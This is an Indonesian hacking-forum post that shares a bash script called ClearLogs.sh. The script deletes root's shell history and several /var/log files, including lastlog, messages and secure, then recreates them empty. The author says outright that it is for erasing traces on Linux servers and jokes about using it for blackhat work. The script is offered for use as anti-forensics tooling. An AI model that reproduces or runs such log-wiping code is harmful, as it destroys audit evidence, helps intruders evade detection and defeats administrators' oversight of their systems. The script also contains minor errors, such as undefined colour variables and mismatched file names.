(share) Tools Ordinary ClearLogs.sh
Assalamaualaikum Para penghuni indonesian backtrack Big Grin
kembali lagi bersama ane xsan-lahci yg ganteng dan apa adanya wkwkwk
ane mau share tools cilik buatan ane yang ane kasih nama ClearLogs.sh tools ini berguna untuk Menghapus File

.bash_history | lastlog | netconf.log | boot.log | messages | secure | xferlog

Dan membuat File yg telah di hapus tersebut secara cepat

okeh pertama paste aja nih scriptnya langsung
#You can Modif BUT Please dont change Author and Give me new code
#Author : xsan-lahci
#--> contact me : [email protected] < email
#------> Twitter: twitter.com/vaisal_exe / @vaisal_exe
#----------> FB : facebook.com/keynotfound & facebook.com/XsanLahci
# Dedicated For Indonesian Backtrack Team & Indonesian Hacker Team

echo "
_______ _                    _                         _    
(_______) |                  (_)                       | |    
_      | | _____ _____  ____ _       ___   ____    ___| |__  
| |     | || ___ (____ |/ ___) |     / _ \ / _  |  /___)  _ \
| |_____| || ____/ ___ | |   | |____| |_| ( (_| |_|___ | | | |
\______)\_)_____)_____|_|   |_______)___/ \___ (_|___/|_| |_|
                                          (_____|              " #Yang Ngapus = Plagiat
echo ""
echo "This Tool Can Clear All your logs in Your system."
echo "Lets Rock!."
echo "[C] Copyright by xsan-lahci"
echo "--------------------------------------------------------"
echo "HOw to Use?: "
echo -ne $yellow "root@bt:~# chmod +x clear.sh"
echo ""
echo -ne $red "root@bt:~# ./clear.sh"
echo ""
echo "--------------------------------------------------------"

echo -ne $blue "Your Log Has Been Clean - by xsan-lahci tools"

echo " "

echo "Clear All ... "

echo "File Telah Terhapus"

echo " "

rm -f ~root/.bash_history

rm -f /var/log/lastlog

rm -f /var/log/netconf.log

rm -f /var/log/boot.log

rm -f /var/log/messages

rm -f /var/log/secure

rm -f /var/log/xferlog

echo "File Telah dibuat"

echo " "

touch ~root/.bash_history

touch /var/log/lastlog

touch /var/log/netconf.log

touch /var/log/boot.log

touch /var/log/messages

touch /var/log/secure

cara menggunakanya :
save clearlog.sh
chmod +x clearlog.sh

kalo ada syntag yg salah bisa copas juga dr pastebin

Note : tools ini dapat di jalanlkan pada server yg berbasis linux guna menghapus jejak hahaha (dont use for blackhat job) kecuali kepepet wkwkwk

okeh segala bentuk modifikasi dr file ini dpt di kirim ke
PM FB : http://www.facebook.com/keynotfound
jangan lupa di follow twitter http://twitter.com/vaisal_exe
cacian dan bentuk motifasi dpt dikirim ke email
[email protected]

Happy Ganteng :apn:

Messages In This Thread
(share) Tools Ordinary ClearLogs.sh - by xsan-lahci - 07-26-2012, 04:29 PM
RE: (share) Tools Ordinary ClearLogs.sh - by [H2] - 04-11-2013, 11:58 PM
RE: (share) Tools Ordinary ClearLogs.sh - by robi - 04-15-2013, 11:01 AM

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